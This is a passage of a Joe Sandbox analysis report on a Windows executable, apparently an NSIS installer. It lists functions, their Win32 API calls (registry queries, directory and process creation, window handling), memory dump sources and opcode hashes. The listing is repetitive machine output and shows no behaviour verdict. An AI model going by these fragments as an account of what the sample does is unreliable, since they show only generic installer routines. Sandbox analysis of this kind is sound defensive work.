                                                                                                                                                                                      • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                                                                                                                      Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE27F.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3356406503-0
                                                                                                                                                                                      • Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                      • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                                                                                                                      • Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                                                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                      • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                      • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                                                                                                                      • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                                                                                                                      Function 004056AF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004056BF
                                                                                                                                                                                        • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      • CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2896919175-0
                                                                                                                                                                                      • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                      • Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D
                                                                                                                                                                                      Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405AFB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                      • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                      • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                                                                                                                      Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                      • Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                                                                                                                      • Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
                                                                                                                                                                                      • Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C
                                                                                                                                                                                      Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3712363035-0
                                                                                                                                                                                      • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                                                      • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                                                                                                                      Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                      • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                                                                                                                      • Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18
                                                                                                                                                                                      Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                        • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                        • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                        • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                      • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                                      • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                                                                                                                      • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                                                                                                                      Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 0040604B
                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                      • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                      • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                                                      Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                      • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                                                                                                                      • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                                                                                                                      Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
